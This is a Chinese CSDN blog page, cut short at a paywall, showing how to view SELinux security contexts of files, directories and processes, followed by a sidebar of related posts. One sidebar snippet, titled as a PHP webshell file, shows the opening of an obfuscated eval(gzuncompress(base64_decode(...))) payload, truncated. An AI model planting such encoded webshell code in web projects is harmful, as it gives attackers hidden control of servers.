SELinux安全上下文查看方法(超详细)

最新推荐文章于 2024-04-01 15:08:16 发布
置顶 最新推荐文章于 2024-04-01 15:08:16 发布
阅读量1k 收藏 7
点赞数 1
分类专栏: 大数据 互联网 人工智能 文章标签: Linux 大数据 大数据学习 大数据开发 大数据分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiujiudsj/article/details/104195516
版权

SELinux 管理过程中,进程是否可以正确地访问文件资源,取决于它们的安全上下文。进程和文件都有自己的安全上下文,SELinux 会为进程和文件添加安全信息标签,比如 SELinux 用户、角色、类型、类别等,当运行 SELinux 后,所有这些信息都将作为访问控制的依据。

 

首先,通过一个实例看看如何查看文件和目录的安全上下文,执行命令如下:

[root@localhost ~]# ls -Z
#使用选项-Z查看文件和目录的安全上下文
-rw——-.root root system_u:object_r:admin_home_t:s0 anaconda-ks.cfg
-rw-r–r–.root root system_u:object_r:admin_home_t:s0 install.log
-rw-r–r–.root root system_u:object_r:admin_home_t:s0 install.log.syslog

可以看到,查看文件的安全上下文非常简单,就是使用“ls -Z”命令。而在此基础上,如果想要查看目录的安全上下文,需要添加“-d”选项,代表查看目录本身,而非目录下的子文件。举个例子:

[root@localhost ~]# ls -Zd /var/www/html/
drwxr-xr-x.root root system_u:object_r:httpd_sys_content_t:s0 /var/www/html/

那么,该如何查看进程的安全上下文呢?只需使用 ps 命令即可。命令如下:

[root@localhost ~]# service httpd start
#启动apache服务
[root@localhost ~]# ps auxZ | grep httpd
unconfined_u:system_r:httpd_t:s0 root 25620 0.0 0.5 11188 3304 ? Ss

最低0.47元/天 解锁文章
jiujiudsj
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux怎么看文件安全上下文,Linux安全控制访问模块之SElinux
weixin_31271165的博客
04-28 881
SElinux1、Selinux介绍:Linux的一个强制访问控制安全模块,2000年以GNU GPL发布,Linux内核2.6版本集成在内核中。DAC:自由访问控制,进程是无束缚的。MAC:强制访问控制,策略的规则决定控制的严格程度(策略被用来定义被限制的进程能够使用那些资源[文件和端口]);进程的可以被限制的;默认情况下,没有允许的行为将被拒绝。2、Selinux的四种工作类型:(1)star...
linux中如何查看文件上下文,linux通过grep根据关键字查找日志文件上下文
weixin_34791683的博客
04-29 5111
linux通过grep根据关键字查找日志文件上下文1、在标准unix/linux下的grep命令中,通过以下参数控制上下文的显示:grep -C 10 keyword catalina.out 显示file文件中匹配keyword字串那行以及上下10行grep -B 10 keyword catalina.out 显示keyword及前10行grep -A 10 keyword catalina....
SELinux安全上下文的认识
虫写的专栏
10-30 1万+
1、SELinux安全上下文 安全上下文是一个简单的、一致的访问控制属性,在SELinux中,类型标识符是安全上下文的主要组成部分,由于历史原因,一个进程的类型通常被称为一个域(domain),"域"和"域类型"意思都一样,即都是安全上下文中的“TYPE”。 SELinux对系统中的许多命令做了修改,通过添加一个-Z选项显示客体和主体的安全上下文。     1) 系统根据PAM子系统中的p
SeLinux安全上下文文件
最新发布
littleyards的博客
04-01 584
在Android中,常见的安全上下文文件有file_contexts、genfs_contexts、service_contexts、mac_permissions.xml和seapp_contexts。seapp_contexts,app的安全上下文,用于描述apk 安装之后的目录文件和/data/data 目录分配标签。根系统中所有文件的安全上下文, 如/system/bin, /system/etc 等文件。系统binder服务的安全上下文,在启动过程中,servermanger会读取该配置。
linux查看目录安全上下文,semanage命令
weixin_32770423的博客
04-29 483
semanage命令是用来查询与修改SELinux默认目录的安全上下文SELinux的策略与规则管理相关命令:seinfo命令、sesearch命令、getsebool命令、setsebool命令、semanage命令。语法semanage {login|user|port|interface|fcontext|translation} -lsemanage fcontext -{a|d|m} ...
Linuxselinux安全上下文
Ying_smile的博客
10-13 517
查看selinux安全上下文:ls -Z [root@localhost ~]# touch /var/ftp/hellohello 新建文件测试 [root@localhost ~]# ls /var/ftp/ 查看目录ftp中的内容 hellohello pub [root@localhost ~]# touch /mnt/haha1 [root@localhost ~]# mv /mnt/haha1 /var/ftp/haha1 #复制是新建的过程,移动是重命名的过程,文件系统权限和属性不会改
安全上下文(进程)
weixin_34258782的博客
05-08 254
为什么80%的码农都做不了架构师?>>> ...
semanage命令 安全上下文查询与修改
01-20
semanage命令是用来查询与修改SELinux默认目录的安全上下文SELinux的策略与规则管理相关命令:seinfo命令、sesearch命令、getsebool命令、setsebool命令、semanage命令。 语法格式:semanage [参数] 常用参数: ...
一键部署某用户ssh后限定在某个目录中(更新selinux安全上下文
11-10
通过chroot方式限制用户ssh登陆后被限定在某个目录中,可以用于作一些只读用户,让其只能访问特定目录,并通过目录下其他目录的属主及权限控制方式实现该用户为...2020-11-10 更新selinux安全上下文 有其他问题请留言。
root安全selinux
02-03
**root安全:深入理解与应用SELinux** SELinux(Security-Enhanced Linux)是一种强制访问控制(MAC)系统,由美国国家安全局(NSA)开发,旨在提高Linux操作系统的安全性。它通过精细的权限控制,限制了系统中每...
SELinux安全系统基础.pdf
11-13
你可以使用`ps -Z`命令查看进程的域信息,`ls -Z`命令查看文件的上下文信息。例如,`unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023`这样的输出包含了用户ID、角色、类型和等级信息,这些字段组合在一起...
SELinux安全系统基础.docx
10-29
SELinux中,关键的两个概念是“域”(domain)和“上下文”(context)。域是用来限制和管理进程的,它定义了进程可以执行的操作。上下文则是对系统资源(如文件、网络套接字、系统调用等)的权限控制,包括用户、...
SEandroid 安全机制---进程安全上下文
Jack的博客
06-10 1414
3进程安全上下文 前面一篇文章分析了文件安全上下文关联过程。但是在SEAndroid中,除了要给文件关联安全上下文外, 还需要给进程关联安全上下文,因为只有当进程和文件都关联安全上下文之后,SEAndroid安全策略才能发挥作用。 也就是说,当一个进程试图访问一个文件时,SEAndroid会将进程和文件的安全上下文提取出来,根据安全策略规则,决定是否允许访问。      在传统的Linux
关于对进程的安全上下文的理解
weixin_45675176的博客
11-14 177
安全上下文图解 进程安全上下文: 进程对文件的访问权限应用模型: 进程的属主与文件的属主是否相同;如果相同,则应用属主权限; 否则,则检查进程的属主是否属于文件的属组;如果是,则应用属组权限; 否则,就只能应用other的权限;总的来看进程对文件的权限受限于文件的本身的权限(ugo) 图示进程安全上下文思维导图: ...
linux进程安全上下文,Selinux安全上下文详解
weixin_28894087的博客
04-29 1023
SELinux介绍DAC:自由访问控制MAC: 强制访问控制DAC环境下进程是无束缚的MAC环境下策略的规则决定控制的严格程度MAC环境下进程可以被限制策略被用来定义被限制的进程能够使用哪些资源(文件和端口)默认情况下,没有被明确允许的行为将被拒绝Selinux策略对象(object):所有可以读取的对象,包括文件、目录和进程、端口等主体:进程称为主体(subject)Selinux中所有的文件...
linux系统下的selinux初级管理
lyy962464的博客
08-21 416
一、selinux安全性 1、selinux内核级加强型防火墙,是可以保护系统安全性的额外机制。 2、selinux的功能             限制服务的功能              限制服务访问功能 3、验证selinux的两个功能 1)在服务端/mnt/目录下建立westos文件,并将westos移动到/var/ftp/pub/下 2)匿名登陆lftp服务,发现wes...
se linux ll-z,selinux常用操作
weixin_42498206的博客
05-25 799
#selinux操作,操作系统centos7,系统selinux为打开状态。破坏selinux标签:# cp /var/log/messages /root/ //只需反复复制到不同的目录,selinux标签就变了 admin_home_t变成了var_log_t,如果系统不开启selinux,新复制的文件标签为空。# ll -Z /var/log/messages-rw-------. roo...
男女之间没有真正的友谊
sejiushiai的专栏
08-07 1427
<br />    不要和有女/男朋友的人走的太近,特别是有女朋友/老婆的男人,他们99%是下半身考虑的动物,他不停的展现他的魅力和能力,你慢慢被吸引...当你觉得他是好人,他可能已经幻想着你在床上的一幕了。你或许认为我说的很武断,不然,我私下和不低于10个男生探讨过,大家都一致认为,如果对未婚女生没有想法,除非她是凤姐。只有有机会,都想方设法的搞搞暧昧,谁知道女生会不会自动投还送抱过来呢,自动过来那就不客气了,呵呵。如果女生比较精明,那就假装是纯真的朋友关系好了。。反正男生不吃亏。特别是处女,对男生吸引最
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 56万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
selinux安全上下文命名
08-17
SELinux安全上下文命名是指为文件、目录、进程等在SELinux中设置安全上下文的命名规则。SELinux使用安全上下文来标识和控制对象的访问权限。安全上下文是由一个或多个部分组成的,通常包括标签和类型。 在SELinux中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值